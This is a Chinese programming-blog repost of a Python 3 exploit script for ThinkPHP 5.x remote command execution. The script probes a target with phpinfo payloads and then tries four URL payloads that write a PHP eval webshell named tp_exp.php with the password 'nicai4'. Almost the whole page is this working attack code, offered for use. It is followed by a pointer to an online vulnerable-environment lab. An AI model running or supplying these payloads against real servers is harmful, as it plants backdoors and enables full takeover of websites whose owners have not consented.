欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

python3编写ThinkPHP命令执行Getshell的方法

程序员文章站 2023-01-13 12:42:03
加了三个验证漏洞以及四个getshell方法 # /usr/bin/env python3 # -*- coding: utf-8 -*- # @auth...

加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @author: morker
# @email: [email]admin@nsf.me[/email]
# @blog:  [url]http://nsf.me/[/url]
 
import requests
import sys
 
def demo():
  print(' _______ _   _    _  _____ _  _ _____ ')
  print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')
  print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
  print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
  print('  | | | | | | | | | |  <| |  | | | | |   ')
  print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')
  print()
  print('\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).')
  print('\tremote command execution exploit.')
  print('\tvulnerability verification and getshell.')
  print('\ttarget: http://target/public')
  print()
class thinkphp():
  def __init__(self,web):
    self.web = web
    self.headers = {
    "user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0",
    "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2",
    "accept-encoding" : "gzip, deflate",
    "content-type" : "application/x-www-form-urlencoded",
    "connection" : "keep-alive"
    }
 
  def verification(self):
    i = 0
    s = 0
    verifications = ['/?s=index/\\think\request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
    while true:
      if i == len(verifications):
        break
      else:
        url = self.web + verifications[i]
        req = requests.get(url=url,headers=self.headers)
        if 'phpinfo()' in req.text:
          s = 1
          break
        else:
          s = 0
        i += 1
    if s == 1:
      print("[+] there are vulnerabilities.")
      print()
      toshell = input("[*] getshell? (y/n):")
      if toshell == 'y':
        self.getshell()
      elif toshell == 'n':
        sys.exit()
      else:
        sys.exit()
    else:
      print("[-] there are no vulnerabilities.")
 
  def getshell(self):
    getshells = [
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>',
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php',
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php',
    '?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>']
    shell = self.web + '/tp_exp.php'
    i = 0
    s = 0
    while true:
      if i == len(getshells):
        break
      else:
        url = self.web + getshells[i]
        req = requests.get(url=url,headers=self.headers)
        req_shell = requests.get(url=shell,headers=self.headers)
        if req_shell.status_code == 200:
          s = 1
          break
        else:
          s = 0
        i += 1
    if s == 1:
      print("[+] webshell :%s password :nicai4" % shell)
    else:
      print("[-] the vulnerability does not exist or exists waf.")
 
def main():
  demo()
  url = input("[*] please input your target: ")
  run = thinkphp(url)
  run.verification()
 
if __name__ == '__main__':
  main()

注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。

环境地址:https://www.vsplate.com/

效果图:

python3编写ThinkPHP命令执行Getshell的方法

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。